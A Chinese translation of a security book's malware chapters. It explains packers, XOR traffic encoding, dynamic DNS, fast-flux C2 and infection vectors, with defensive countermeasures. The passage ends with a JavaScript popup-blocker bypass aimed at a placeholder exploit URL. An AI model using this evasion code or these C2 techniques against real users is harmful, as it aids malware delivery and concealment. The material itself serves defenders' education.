正如黑客的技能水平一样,打包程序也有不同的完备度以及许多功能性选项。打包程序常常能对抗防病毒保护,也能增强恶意软件的隐蔽性。打包程序能够为黑客提供一组健壮的功能,例如发现虚拟计算机并进入使其崩溃、生成很多异常、利用多态代码避开执行防护,以及插入无用指令增加打包后的文件尺寸,从而更难发现等一系列的能力。你一般会在这些无用指令中发现ADD、SUB、XOR指令以及对空函数的调用,这些指令用来摆脱取证分析。一般,你还会发现多个文件(例如可执行文件)一起打包或者一起受到保护,其他可执行文件将装载到第一个被解包的文件的地址空间中。 下图是打包程序过程的一个简单实例。 使用打包程序最强大的地方是恶意软件不需要访问硬盘,所有程序都作为进程内存运行,这一般能够避开大部分防病毒和基于主机的安全工具。利用这种方法,如果这个打包程序是知名的,防病毒引擎能够在其解包恶意软件时发现它。如果打包程序是不公开或者新型的,那么防病毒软件就不可能避免恶意软件运行,在这次对抗中也就失败了,并且不能触发任何使管理员采取行动的警告。在图1-6中,你能够清晰地看到,前两年数字取证业界发现的打包程序的数量的增长。 网络编码 大部分网络安全工具可以使用网络编码来避开。现在几乎所有企业网络都允许HTTP或者HTTPS通过所有网关,所以编码后的恶意软件能够轻易地穿越边界防护系统。下面是一些网络编码方法的实例。 图 1-6 2007~2009年间发现的打包程序 XOR XOR是一种简单的加密过程,用于避免网络通信被网络安全设备发现。你一般会发现XOR流隐藏在安全套接字层(SSL)这样的协议中。这样,如果IDS分析师只进行一次简单的评估,这次通信看上去是加密的,但是进行了深入的封包检测之后,分析师将会注意到这个流不是真正的SSL通信。 XOR是一种简单的二进制运算,如果两个二进制输入值相等,则输出0;如果不相等,则输出1。XNOR正相反,如果两个输入值相等,则输出1;如果两个输入值不同,则输出0。当恶意软件准备执行时,它将通过相反的过程访问数据,运行所编写的实际二进制文件。XOR和XNOR是快速改变静止或者运行中的数据以避开检测方法的简单引擎。 大部分聪明的恶意软件编写者不会采用存档程序来进行编码,因为大部分企业网关应用程序能够解码各种公用的存档程序。在网络中虽然可以实现存档保护的恶意软件的分段传输或者“断续”的传输,但是如果恶意软件的任意部分被识别出来,它将被从系统中清除,这样恶意软件就无法被组合成编写者所希望的整体。 1.6.4 动态域名服务(恶意软件实例:W32.Reatle.E@mm) 动态域名服务(Dynamic Domain Name Services,DDNS)是黑客们最新的发明,而最先它是使企业管理员能够快速地在网络中增加机器的一种管理性改进。当Microsoft在其活动目录企业版系统中实现DDNS,并将其作为一种快速将机器上线和离线的情况通知网络上的其他计算机的手段时,DDNS就为人们所熟知了。DDNS使恶意软件能够进行外部联网和匿名操作而不用担心归属地被发现。DDNS是一种域名系统,它的域名IP解析可以实时更新,一般在几分钟内就能完成。域名的宿主名称服务器几乎始终保持着指挥控制服务器的缓冲记录。但是,(被入侵的/受害)主机的IP地址可以在任何地方并且可以随时移动。将域的缓冲限制在很短的时间内(几分钟),可以避免其他名称服务器节点缓冲原始主机的旧地址,确保受害者使用恶意软件编写者控制的名称服务器进行解析。 1.6.5 Fast Flux(恶意软件实例:trojan.peacomm) Fast Flux是当前的僵尸网络、恶意软件和仿冒方案最常用的通信平台,通过一个不断变化的被侵入代理主机的网络,可用此平台传递内容和指挥控制。对等网络拓扑结构也能够将Fast Flux作为遍及多个指挥控制服务器的指挥控制框架,像菊花链一样传递信息而不用担心被发现。Fast Flux和DDNS很相似,但是速度更快,想要抓住恶意软件背后的编写者和策划者将会更加困难。我们前面提到的StormWorm就是很好地利用这一技术的一个新型恶意软件变种。图1-7展示了两种形式的Fast Flux:Single-Flux和Double-Flux。在这张图中,你能看到受害者之间的Single-Flux和Double-Flux的简单过程,以及每种方法的查找过程。 Single-Flux Fast Flux的第一种方式一般在一个网络中包含多个节点来登记和注销地址。这种方式一般与用于单个DNS条目的一个DNS A(地址)记录相关,并且为单一域名生成一个变动的目标地址列表,这个列表的条目数可能从几百到几千条。一般来说,Single-Flux DNS记录的生存时间(TTL)设置得非常短,以确保记录不会被缓冲,地址能够快速地移动而不用担心被记录。 Double-Flux 第二种形式的Fast Flux的实现要困难得多,虽然和Single-Flux相似,但是多台主机并不是组成一个登记和注销DNS A记录的网络,而是组成一个名称服务器的网络,登记和注销生成DNS分区列表的NS记录。如果一个节点被发现,这种实现确保恶意软件具备一个保护层和生存能力。你一般会看到被侵入的主机在名称服务器网络中作为代理,将这些主机埋藏到一个代理网络中,有助于保护执行指令的恶意软件网络的身份。由于代理的数量很多,完全可能保护恶意软件编写者,这也就增加了恶意软件系统的生存率,甚至超过了放置在合适位置用于避免受侵害主机访问多个可能的指挥控制点的IP块的能力。 图 1-7 Single-Flux和Double-Flux 要记住,攻击者只需要一个方向就能对你发动攻击,而防御者需要知道并且保护所有的方向,谁的成功几率更大?在这个领域警惕性是必须的。 由于利益的关系,过去10年中为了简化管理员工作所添加的路由和网络服务功能正被不法分子利用。除了对你的用户进行全面的培训和教育,让他们在没有真正得到信任的邮件发送者的确认之前,不要打开邮件或者附件(即使这些邮件的来源受到信任)之外,对这些技术没有更好的防范措施。这么总结起来有些伤心,但是现在你的用户是最后一条防线。如果他们没有得到进行简单分析的培训,你的网络就会因为我们已经讨论过的这些传播方式而遭到失败。要注意,现在的用户还没有能够快速地由电子邮件附件中接收到的域名验证域名和/或真实性的工具。有些企业工具能够鉴定真实性,但是执行真实性验证所需的时间对于日常商业运作来说成本可能太高。 现在我们来到了本章中有趣的一部分…… 1.7 恶意软件传播注入方向 本小节将介绍恶意软件传递到受害者以便进入计算机的真正方法。有许多主动的方法来向受害者发送和传递恶意软件,也有一些依赖于社会工程或者受害者访问存储恶意软件的内容的被动方法。这些方法每天都在使用着,本小节希望提供对恶意软件生命周期中的一个重要部分的一些认识,这个部分就是——使你成为受害者。 1.7.1 电子邮件 你是否曾经接收到带有不能确定附件内容的邮件,而在惊鸿一瞥之间这个邮件又能引起你的足够兴趣去打开?电子邮件成为网络管理员的灾星以及所有坏家伙们进入你的网络的门户已经有超过10年的历史了,在20世纪90年代时如此,到2009年这种案例变得更多了。从安全管理员的角度来说,你希望尽可能地阻挡。从网络操作的角度来说,你希望尽可能确保业务持续性,这意味着开发一些门户。电子邮件是你的网络中始终开放的两个门户之一,另一个是恶意网站。我们将在本章后面的内容中介绍恶意网站。从2007年开始,由于企业安全措施和边界保护的加强,通过直接的机器对机器进行感染的蠕虫传播已经基本终结。 从历史上看,管理员常常忽略网络中的最后一个堡垒和最强大的入口就是用户,但是恶意软件作者不会忽视这一点。用户是穿透任何网络的硬壳的途径。最常见的基于电子邮件的恶意软件注入技术包含嵌入式的攻击,所使用的技术也称为客户端攻击。社会工程是所有基于电子邮件攻击的核心,这也同时训练了你的员工。然而,在我作为顾问的大部分组织中,领导层都没有太把这一点放在心上。 在你的用户打开接收到的所有电子邮件时,你仍然觉得安心吗?很多时候,我希望用胶带把网络上的用户捆起来,或者在键盘和他们之间放置一层厚玻璃,只允许他们通过一个小洞,一次只能按下一个键,从而延缓病毒的爆发。但是考虑到业务运作的全局,我所喜欢的方法的代价都太高了。你不能限制网络用户完成日常的业务操作。如果这么做,他们当然会寻找绕过你的安全措施的途径。所以操作、安全和用户培训及意识之间始终有联系。 电子邮件威胁 本小节重点介绍两个最难对付的传递机制之一。在当今的商业界,每个员工通常都提供一个公司或者业务电子邮件地址同外部组织或者个人进行业务联络。这对于安全管理员来说是个艰巨的工作,对于负责这一工作的利益相关方来说是更大的负担,他们需要不断培训和监控员工,确保员工理解和意识到威胁。如果你以同恶意软件斗争为生,这些方法中有些可能非常熟悉,但是有些方法则可能是陌生的。 受信任的内部人员的社会工程:在本书中,与恶意软件相关的社会工程已经多次提到,以后还将不断地介绍,因为社会工程是恶意软件作者最强有力的注入方向。确保受信任的内部人员不会发现自己正在阅读一封普通的“跳舞熊”邮件或者高度成熟的“针对性”邮件是犯罪分子最重要的目标——这两种邮件都用来愚弄阅读者,使其打开或者执行其内容或附件,以便控制收件人的系统。一旦犯罪分子对受害者展开社会工程,攻击者可以使用几乎任何方法来利用受害者。最后,对于安全管理员来说最重要的一点是,真正理解并且知道这种方法需要你尽到职责,确保安全程序包含对新来的雇员的强制性培训。 电子邮件攻击类型:Microsoft Office文件处理 一般来说,这是社会工程之后的第二次注入。这种方法采用大量Microsoft Office产品中潜藏的各种利用代码。到目前为止,Microsoft Word、Excel、PowerPoint和Outlook已经成为主要的焦点。但是,很多其他产品已经成为目标,变成电子邮件附件执行以后立即快速入侵系统的一种途径。最重要的一点是,这种类型的攻击可以用于Adobe和几乎所有运行在你的系统上的、用于阅读和/或打开附件的本地应用程序。下面我们介绍几百种这种类型的攻击中的一种,供你参考。 ·名称 Microsoft Excel文件处理允许远程代码执行漏洞 ·CVE CVE-2008-0081 CVE-2008-0111 CVE-2008-0112 CVE-2008-0114 CVE-2008-0115 CVE-2008-0116 CVE-2008-0117 ·Microsoft MS08-014 ·Bugtraq ID 27305 ·描述 Microsoft Excel的一个漏洞,已经得到报告,远程用户可以利用它入侵用户的系统。在处理具有残缺的文件头信息的Excel文件时,存在一个未具体说明的错误,可以通过哄骗用户打开恶意Excel文件这样的手段,利用这个漏洞来执行任何的代码。 ·受影响的系统 Microsoft Office 2000 Service Pack 3,Microsoft Office XP Service Pack 3,Microsoft Office 2003 Service Pack 2,2007 Microsoft Office System,Microsoft Office Excel Viewer 2003,Microsoft Office Compatibility Pack for Word,Excel,and PowerPoint 2007 File Formats,Microsoft Office 2004 for Mac,and Microsoft Office 2008 for Mac ·解决方案 该漏洞已被修复,用户应该应用http://www.microsoft.com/technet/security/Bulletin/MS08-014.mspx上的补丁。 电子邮件威胁的对策 在接下来的小节中,我们将讨论对抗当今的电子邮件威胁的一些最强有力的对策。虽然这些对策看上去很简单,但是非常重要。 原则1 保护自己免受电子邮件传递的恶意软件感染的最重要步骤是了解所收到的内容。你接收到的文件是不是一个已知的恶意软件携带者,是不是能够控制你的系统?确保你的用户启用“查看文件扩展名”功能。 原则2 除非你迫切地需要一个文件,否则绝不要打开来自任何人的可执行文件,因为恶意软件一般都来自于你所认识的某个人。让向你发送可执行文件的朋友在传输之前修改文件扩展名,例如,将.exe改为.ex_,.zip改为.zzz。更重要的是在附件有问题时参照原则3。应该牢记,这种方法仅在不执行识别文件类型的文件头检查的电子邮件系统下有效。 原则3 任何时候都始终为你的系统打上补丁。我们强烈建议家庭用户将系统配置为每天至少检查一次更新。更新的时间设置最好为深夜或者凌晨,可以避免与其他应用程序和/或日常业务操作冲突。对于企业用户,我们强烈建议使用Microsoft Windows软件更新服务(SUS)管理器,这个套件能够从单一服务器在整个企业网络中推送更新,可以设置为每天多次检查更新,并且只需要从单点下载。这能避免使你的整个企业每天都从Microsoft下载一次,从而根据企业办公室的不同位置,在不同的时段突然造成网络上的瓶颈。 原则4 如果不需要,就删除附件。 亲身经历:电子邮件利用 我曾经在各种水平的私营企业和美国联邦政府的IT安全岗位上工作过。最致命的电子邮件利用方式被称为鱼叉式仿冒(spear phishing)或者岩石仿冒(rock phishing)。恶意软件散布者或者编写者通过这些方式,编造一个组织用户所信任的地址,或者来自于用户所知晓的组织的地址来发送精心编造的电子邮件。这种威胁已经在美国政府网络中蔓延超过5年了,安全工作中最大的不足是工作人员不能清楚地理解阅读和打开邮件所带来的威胁。在我的经历中,我已经看到在很多各种水平的组织中,都为了急急忙忙地阅读而打开这些邮件,导致自己的网络遭到感染。用户很难完全理解究竟谁才是可信任的邮件发送者,虽然有一些可用的培训,但是仍然严重缺乏实际的工具。 1.7.2 恶意网站 客户端攻击在过去的几年中已经兴起,坏家伙们已经意识到用户还没有受到良好的训练,因此容易采取社会工程手段。我们不是说用户不聪明,他们只是缺乏训练。 让我们来讨论一下Contagion蠕虫的概念。在《How to own the Internet in Your Spare Time》(如何在业余时间里拥有互联网)这篇文章中(可在http://www.icir.org/vern/papers/cdc-usenix-sec02/上找到),作者讨论各种传播技术,但是这篇文章最核心的部分是对Contagion蠕虫概念的讨论。这种蠕虫能够无缝地从服务器转移到客户端,从而在正确运行的情况下,几个小时内就可能感染数百万台机器,从这点上说,Contagion蠕虫的概念类似于“完美风暴”。 看上去相当具有毁灭性,不是吗?这种方法非常高效,可能导致数百万互联网用户沦为恶意软件传染的受害者,而且在相当长的时间内他们并不知情。 恶意网站威胁 恶意网站是个严重的问题,因为任何网站都可能是恶意的,即使一些最有名的网站也已经成为恶意组织的猎物,恶意组织将恶意软件载入这些网站,等待数百万不知情的用户访问该网站,从而立刻被特洛伊植入程序感染。现在,大部分时候,你将发现1/5的网站正处于被恶意软件感染而变成恶意网站的危险之中。另一方面,实际上1/20的网站有某种形式的恶意感染、嵌入重定向,以及/或者链接到受感染的网站。这对你来说意味着什么?你的用户每天在互联网上冲浪,访问他们的个人、专业和媒体网站,对吗?这打开了你的企业和用户的家庭网络,如果你的VPN没有正确配置以过滤未授权的端口和协议,这种威胁就会传播到你的企业网络中。 在用户从你“安全”的内部网络之外进入时,正确配置你的VPN的需求是个严重的问题。大量的恶意内容,包括后门、Trojan-PSW、Trojan-Dropper、Trojan-Clicker以及Trojan-Downloader可能为许多可以远程访问到的恶意软件变种打开能长期使用的门户。如果恶意软件爆发而你处于危险时,强烈建议以Web或者HTTP过滤作为最后一道防线。 针对性的恶意网站你必须知道,黑客团体并不像大部分世界领导人所认为的那样是一群乌合之众。在我的经历中,我已经遇到一些黑客,他们确实识别出网络上的一个用户群体每天都利用和访问的具体网站,他们只需要把精力花在入侵这些具体的网站上,就能确保很快地载入一些客户端利用;然后他们的猎物很快而且很容易地遭到了攻击,无人能幸免。而且这种威胁很容易实现,因为所有边界网络安全设备将不会因这种恶意用户的访问和攻击而发出警告。 恶意网站攻击 网站攻击的基础是客户端利用,这很简单。你的计算机访问一个网站并且下载网站代码,然后在本地运行。这些代码都隐藏在你的HTTP会话封包中,一般可以用多种方式潜藏和混淆,使得防火墙、NIDS和防病毒软件不能及时发现。客户端利用是进入你的网络的一种精致、简捷和直接的方法,只有在几天、几周有时候甚至是几个月后当你发现企业系统的表现有些奇怪时,才能够发现它。几乎所有攻击都指向你的互联网浏览器,不管你用的是哪一个——IE、Firefox、Netscape、Opera、Safari,或者其他更多的浏览器,你都不安全。 基于恶意网站的恶意软件的对策 培训用户必须理解互联网冲浪可能将恶意软件带入企业。现在,多半发送给用户的电子邮件链接都进行客户端利用,当用户单击这些链接时就会在主机上装入各种类型的恶意软件。首先应该通过适当的措施和教育来避免这种情况。 防间谍软件模块随着Windows XP的发行,Microsoft引入了它们的防间谍软件工具—Microsoft Anti-Spyware,这个软件在2002年从GIANT软件公司取得。这确实是个好工具,它对经过检验和许可的Windows XP用户是“免费”的。后来,Microsoft又发行了Windows Defender,这也是一个好的工具。但是,这些工具的安全只能和它们保护的系统一样好,一个脆弱的系统将会使Windows Defender无能为力,无法避免操作系统的进一步感染。但是至少这些工具能够提供帮助,我们需要所有能够取得的工具。 基于Web的内容过滤一些企业网络工具(如WebSense)在与恶意网站的斗争中是有帮助的,但是它们只能利用IP黑名单、扫描算法和特征码来发现攻击和恶意软件变种。每种基于特征码的系统的问题都在于要具备识别恶意活动的需要的所有特征码,和/或足以处理大量企业级通信的高速度。 1.7.3 网络仿冒 网络仿冒目前已经引起在IT相关行业工作的所有人的注意。你的用户在工作中或者在家里收到一封看起来合法的电子邮件,但是实际上这是一个精心编造的假象,诱惑用户单击一个链接或者提供足够详细的个人或者职业信息,这些信息使攻击者可以窃取个人身份,或者得到关于所在公司的更详细信息,以便得到对私人或者公共信息资源的访问权,从而导致更大的破坏或者得到利益。 例如,上个月我刚刚收到似乎是从Wachovia银行发来的一封电子邮件,如下图所示。 看看下面的第二封邮件,你会看到嵌入的URL来自于中国的一个IP地址。记忆中,我们不知道在中国是否有Wachovia的分支机构,你呢?最关键的是我们没有Wachovia的账户。那么我们会怎么做?我们致电Wachovia并且向他们提供该邮件的信息,并将邮件发送到abuse@wachovia.com,让他们的内部人员跟踪该邮件背后的犯罪组织。你可以想想,当一个坏家伙发送100万封仿冒邮件时,只要有1%的收件人(也就是1万人)打开这个邮件,那么就有1万人的身份信息被偷窃或者系统遭到这个坏家伙的控制。绝大部分情况下,你一般都会看到一个国际性的收信人列表,这使得国际执法组织难以协调工作来了解恶意软件运作者。 现在想象一下这1万名收信人,如果他们的计算机受到感染,他们的地址簿上面有多少人,这些人的地址簿上又有多少人。受害者列表以非常快的速度呈指数增长,你能了解仿冒是怎样成为安全界的梦魇了吧?仿冒能够导致直接窃取身份或者带有恶意代码(客户端攻击)的URL,这在前面内容中已经提到过。 现在我猜你一定想要知道,“我怎么避免用户受到仿冒?”答案是:培训!培训你的员工识别发送电子邮件的人;如果邮件是合法且有嵌入的URL或者附件,让这位员工在打开邮件之前致电发信人进行验证。大部分国际组织要求员工这么做,这只需要一点时间,却可能为你的组织挽回几百万损失。 电子邮件恶意软件传播也称为鱼叉式仿冒,是最有效的仿冒方法。电子邮件仿冒的概念从20世纪90年代中期就开始使用,其中最为人瞩目的是在美国在线网络(America Online network)中的运用。但是,鱼叉式仿冒在过去几年中已经作为更具针对性的仿冒方法而再次兴起。 网络仿冒威胁 在对付网络仿冒时,有两种主要的威胁是你确实应该注意的:个人信息的丢失,以及你或者你的雇员通过仿冒泄露的公司信息可能引起的更大的破坏。还有第三种威胁,但是这和刚刚介绍的恶意网站相同。这些威胁一开始似乎没有什么了不起——哄骗你提交信息的看似正式的假象——但是,这种阴谋造成的损失总是大于填写表单所花费的几分钟时间。 现在想象一下,你只花费了10~15分钟来填写询问你的信息(身份、银行、健康状况、职业、公司等)的表单,它只是把你引导到一个POST提交死链接(在标准Web表单上的最后一个提交按钮),现在所有信息流出到网络空间并且落入许多组织的手里,这些组织的目标就是将这些信息用于各种目的,这些目的都不是你所感兴趣的。有时候在恶意网站上单击按钮就等于批准计算机在你填写表单或者等待提交过程结束的同时在后台装入恶意软件。 来自网络仿冒的攻击 网络仿冒攻击有两种主要的类型,我们将简短地加以介绍并且提供一些说明,让你能更好地深入理解这些用来对付你的阴谋。网络仿冒攻击一般是被动的或者主动的。 主动仿冒 这种方法是基于电子邮件的,一般要求用户在阅读邮件时单击一个链接,将用户转到一个仿冒得很逼真的主流公司网站。一般你会发现主动仿冒方案大都按照大公司网站的样子建立。 注意:询问为你个人或者公司服务的银行,了解它们目前是否公告针对其成员的仿冒阴谋。你还可以联系一些大公司,比如eBay、Amazon、iTunes、Yahoo、MySpace甚至Microsoft。 用户一般信任这些网站,因为他可能有这些网站的账户或者软件。更重要的是,这些仿冒阴谋将会要求账户信息以便窃取你的身份证明,然后将这些账户用于他们的邪恶目的。主动仿冒还可以在免费广告中看到,在这种广告中,用户可能收到一个邮件,声称如果他们填写表单并且提交信息,甚至可能提供多个朋友的邮件地址,将会收到网站所提供“免费的500美元礼券”。 下面是主动仿冒阴谋的一些实例。 被动仿冒 这种方法一般是绑定到搜索引擎的闲置网站,慢慢地等待着用户的信任,然后用户被一个虚假的数据前端所诱惑,按照要求填写申请表并且单击提交按钮。单击按钮之后,用户一般得到一个回到同一页面的借口,最终因为没有结果而沮丧地离开这个网站。这种被动方法可能有两种结果:一种是所提供的信息用于另一个恶意的用途,另一种是该网站在用户单击提交按钮时确实运行了恶意软件并且将其安装到用户的计算机上。后者在1.7.2节中已经介绍过,但是这仍然是恶意软件由其他形式的恶意代码进行分发和承载的另一种方式。 下面是被动仿冒阴谋的一些实例。 网络仿冒的对策 培训 用户需要了解,在互联网冲浪可能把恶意软件带进你的企业。现在,超过半数的发送给用户的电子邮件链接都会把他带到一个网站,要求他输入可以用于窃取信息的个人或者公司信息。这可以通过保持警惕和教育来避免。 反网络仿冒模块 随着Microsoft Internet Explorer 7.0的发行,反仿冒模块和弹出窗口拦截程序作为完全集成的模块引入,为你的系统提供进一步的保护。但是很不幸,大部分最终用户都禁用这个服务,以避免影响业务运作及/或办公时间内的个人生活质量。 渗透测试 你可以通过雇佣一个小组以固定的方式进行仿冒攻击来培训员工,从而训练他们在未来识别潜在的仿冒企图。 1.7.4 对等网络(P2P) 对等网络技术在20世纪90年代末开始抬头,最初它对于大部分最终用户来说是天赐之物,后来一些狡猾的人或者集团发现他们可以在一个P2P文件中发布恶意病毒,下载后一旦执行,他们就控制了你。2002年,在坏家伙们再次开始为了经济利益而这么干的几个月之后,高等法院裁定,媒体公司在具有版权的产品中携带恶意软件,并且将其部署在P2P网络上以破坏非法下载者的机器的行为是非法的。在当时这是令人印象深刻的举动。 现在,对等网络的概念已经远远超越了主要用于分散信息传播以及Morpheus式的文件共享网络的原始模型。现在恶意软件实施对等通信,以便将僵尸网络和蠕虫传播到历史上从未有人预测到的地方。多年以前,安全专家已经预测到恶意软件的新进展将导致全球性的传染,我们现在就能发现这种预言是可能成真的。现在,对等网络恶意软件已经开始兴起,在接下来的几年里,它将成为大规模地部署恶意软件而不用担心当局发现和提起诉讼的最新和最热门的方法。实施一个对等恶意软件网络的力量在于它天生具备长期生存的能力,不需要任何单独的指挥控制点。不要忘记,P2P文件共享网络也是隐藏在像bittorrent、Kazaa等网络上的非法传播文件中的恶意软件的最大所有者。这种极其成功的网络架构已经为实施相似的指挥控制结构铺平了道路。 例如,在1000台主机的对等恶意软件网络中,你可能有12个指挥控制(C2)服务器。现在这些指挥控制服务器中,每个服务器都控制着这1000个主机的一个子集。我们假设每个指挥控制服务器接受75~90个主机的报告。现在每个子集在很小的生存时间半径之内(TTL=3)至少可以对其他子集有少许了解(2~6台主机)。如果在同一分段的6台主机向不同的C2服务器报告,每个服务器理论上应该有子集中的每台主机的列表,然后是在TTL半径内的其他一些主机。这种通信方法确保所有C2服务器知晓网络的整体情况,而不需要直接访问整个网络,网络防御者也就不会直接了解整个网络的情况。图1-8是恶意软件对等网络的C2结构图。如果你关注主机1并且观察通信路径,它会向3个TTL之内的所有主机发送信息,穿越多个子集,每个更新都会被传送到各自的C2服务器。 来自P2P的威胁 我将把P2P威胁分为两类——操作型和法律型——这两种威胁对你的家庭和企业网络都有严重的影响。 图 1-8 P2P常见结构 操作型 P2P不仅在你的网络上打开多个端口,还将你的网络文件和信息开放给世界上的几百万个其他P2P用户。这些用户中有些是无害的,而有些人在P2P上就是为了向全世界散布恶意软件。对于后者,你将在执行恶意软件时受到感染。现在,在你的网络上打开的应用程序和端口就像是“任何人”进入你的网络并且为所欲为的门户。这些方法本质上具备了一个被感染的文件感染一个系统,一个系统再传染另一个系统的多米诺效应,这就是要点。 法律型 我不是一名律师,但是我们都知道在过去的10年,国际上已经实施了保护集团公司版权和许可的法律。P2P的出现使世界软件和媒体市场损失了数十亿美元,并且对整个世界的市场造成了负面的影响。简而言之,如果你的用户或者家庭使用P2P网络在你的企业中下载文件,你就更可能受到侵害,而且在任何时候都可能被许多对P2P网络进行清洗的法人识别出来,根据IP地址所在地的法律规定不同,可能对这种侵权行为课以数百万美元的重罚。 来自P2P的攻击 对操作型威胁的担心主要来自于对你的网络中使用的P2P应用程序的控制及其相关P2P文件的执行,这是你需要注意的重大问题。最起码,如果用户能够安装、下载并且执行P2P文件,你的主管不会对你的绩效给出满意的评价。 P2P对策 培训 用户必须理解,在家里或者办公室里安装P2P应用程序可能导致严重的恶意软件感染。以P2P作为主干来分布恶意软件从20世纪90年代末就开始了,使用的软件包括Morpheus、Kazaa、Gnutella以及其他许多很容易在互联网上下载的工具。必须让用户明确地了解使用P2P应用程序在法律和技术上的影响,特别是在建立用于连接到你的VPN进入企业的PC上使用P2P。每个人都喜欢的“自由”这个词——并不总像表面上那么自由。P2P网络确实有合理的使用方法,但是多数时候,黑客将通过在自由交换的文件中嵌入或者隐藏恶意软件来妄用P2P的信任机制,而用户将会由于没有完全理解从这些网络中进行下载时涉及的威胁而错误地下载并且遭到感染。 公司策略 公司策略在保护你的企业中也非常重要。了解公司策略漏洞的用户可以装聋作哑,利用这些漏洞牟取私利。更重要的是,你的公司策略应该明确指出,如果雇员在网上使用P2P应用程序被发现时将发生什么——特别是,一家专业的公司必须预想到,当有人将非法和可能是恶意的文件下载到公司的系统上时所可能带来的后果。 个人经历:对等网络 当我第一次体验P2P网络的有害之处时,和所有人一样,也是在20世纪90年代末开始从Gnutella和Morpheus这些地方下载媒体。我很快听说了一种最快和最容易地获得远程用户访问权的方法,也就是把恶意文件上载到P2P网络,然后只要等待轻信的用户下载这个文件(一般打上了某种诱人的标签)并且执行。这种方法将立即使某个人能够远程访问你的系统并且任意使用它。我承认这种情况曾经两次发生在我身上;我只是为自己始终在家庭网络上运行超过一个系统而感到幸运,在这种时候就可以很容易使用tcpdump监控到。这只是我的个人和职业经历中遇到的许多P2P威胁实例之一。但是,我在前面也已经提到过其他几个在实际生活中与自己相关的恶意软件实例。 1.7.5 蠕虫 在1.5节中,我们介绍了大部分业界范围内的流行恶意软件及其传播技术。但是,我们没有讨论蠕虫的整体策略,以及它们除了作为传递点之外的用处;我们没有真正地从企业影响的角度去研究蠕虫所能做的一切。蠕虫只是恶意软件编写者最终目标的传播层。在第2章,我们将深入讨论恶意软件的功能性,所以你要坐下来继续阅读,这样可以更好地理解恶意软件在你的系统上时的功能。 来自蠕虫的威胁 蠕虫是每个网络和安全管理员的灾星。前面讨论的StormWorm是目前开发出来的最危险和高效的蠕虫。它利用了一个特洛伊木马植入程序,一个Rootkit以及一个P2P通信结构——一个令人惊讶而且“几乎”完美的网络风暴(所以被称为StormWorm——风暴蠕虫)。来自蠕虫以及它们本身的最大威胁是其中的大量功能,特别是在几个小时内传遍互联网和企业网络的能力。 来自蠕虫的攻击 一般,你会发现在一个蠕虫中实施了多种传播技术。社会工程导致的文件执行(基于客户端)注入、基于Web的感染(基于客户端)、网络服务利用,以及基于电子邮件的传播是最常用的方法。所有这些来自蠕虫的攻击现在执行和传播得如此之快,以至于你必须更好地理解蠕虫本身用于进一步传播的方法。越新的蠕虫变种越采用高级和易变的传播方法来穿越网络。 蠕虫对策 强大的网络保护 没有一种供应商声称能提供100%保护你的系统免遭蠕虫侵害的工具。很不幸,你必须采用分层次的方法并且使用多种工具来帮助识别蠕虫并且主动地保护你的网络资源。一般,在你的网络最重要的网络出入点需要混合型的IDS或者IPS,例如精确以及部分的指纹匹配系统,来作为每日更新的防病毒引擎的补充。 强大的主机保护 有多种可用的HIDS和HIPS工具,在第9章,我们将介绍几种目前发现和避免恶意软件通过你的网络传播的最佳工具。 1.8 本书配套网站上的实例 在本书的配套网站上,提供了多个可供你在业余时间里分析的恶意软件实例(见http://www.malwarehackingexposed.com/)。所有这些实例存为IDA Pro 4.8.0格式的映像文件以供深入分析。我们强烈推荐Olly Debug(OllyDbg),这是一个用于Microsoft Windows二进制代码的32位汇编程序级分析调试程序,它在分析恶意软件上比默认的Microsoft Windows Debugger(WinDbg,发音为“windbag”)要高效得多。为了彻底了解恶意软件分析环境的建立方法,你最好在互联网上搜索一些能够为配置逆向工程系统提供详细过程的指南。 为了你的网络的安全,请确保你的恶意软件测试环境完全独立于常规的网络,以防备你不小心打开某个不安全的程序。我再次列出各种恶意软件实例,让你在空闲的时候进行更多的学习。但是,请记住错误地处理这些映像可能导致机器被感染,还要记住这些实例也可能触发或者标示在任何最新的防病毒引擎的特征码定义上。 1.9 小结 总的来说,我们介绍的传播技术都极其难以防御,更加难以用传统的事后剖析方法来识别。我们所讨论的这些技术的任意组合能够而且已经造成了令世界进入暂时性混乱的全球性流行。这些技术加以适当的组合都很难阻止。当今仅有的能够接近于识别这些传播的技术是基于行为的入侵检测系统及/或实时看到所有恶意行为的honeynet技术。 正如你所看到的,现在的恶意软件更加高效,更有计划,这不可避免地需要金钱的支持。已发表的大部分恶意软件都由具备和防病毒软件和安全公司同样的资源和资金的机构来组织和开发。更重要的是,任何安全研究人员预言的下一次恶意软件高峰都会在18个月内到来,这一规律从未被打破。 第2章 恶意软件功能 我们已经介绍了恶意软件如何传染、存活以及在企业中传播,接下来将要讨论第1章中介绍的各种恶意软件实例的功能。当今的恶意软件可以执行许多任务;但是,它的核心目的是赚取你所付出的金钱以及窃取保存在你的系统上的宝贵信息。我们将在本章中介绍恶意软件侵入你的计算机之后可能产生的一些危险。 2.1 恶意软件安装后会做什么 恶意软件的目标取决于编写和购买恶意软件的人以及软件本身所提供的功能和传递的内容。现在让我们深入到恶意软件功能及其用于从你的网络窃取信息的细节之中。 2.1.1 弹出窗口 弹出式广告已经折磨互联网用户超过10年了。弹出式的恶意软件背后的思路是使用户单击弹出窗口。一旦用户单击了弹出窗口,他就被带到一个预先定义的URL。然后,恶意软件所有者因为受害者对网站的每次访问得到酬劳。每个恶意软件运作者都设置一个特有的ID,然后它的恶意软件变种的每次访问都被统计,通常每次几分钱,并且随着时间的推移进行记录,转移到一个半匿名的银行账户。在银行里,恶意软件所有者每个月得到一张支票,平均每个月可以得到几百到几千美元。 到2002年初,几乎所有主要的Web浏览器(除了Internet Explorer)都允许用户拦截几乎所有不想要的弹出窗口。Opera是第一种集成了弹出式广告拦截工具的主流浏览器,它的弹出窗口拦截程序非常有效,不仅能够阻止未验证的弹出窗口,还能阻止你所想要的弹出窗口的显示。和其他弹出窗口拦截程序一样,你必须到首选项中指定允许弹出窗口的网站。这个拦截程序在那时非常有效,但是随着技术的进步,黑客避开弹出窗口拦截程序的方法也在进步。除了URL重定向,最直接的方法之一是由插件程序(例如Java或者Flash)直接通过弹出窗口注入用户的计算机。下面是一个非常简单的JavaScript脚本,可避开传统的弹出窗口拦截程序。 <HEAD> <SCRIPT LANGUAGE="JavaScript"> <!——Begin function popUp(URL){ day=new Date(); id=day.getTime(); eval("page"+id+"=window.open(URL,'"+id+"', 'toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0,resizable=0, width=200, height=300,left=740,top=375');"); } //End——> </script> <form> <input type=button value="Open the Popup Window"onClick="javascript: popUp('http://mailicious.url.net/expl01tu')"> </form> 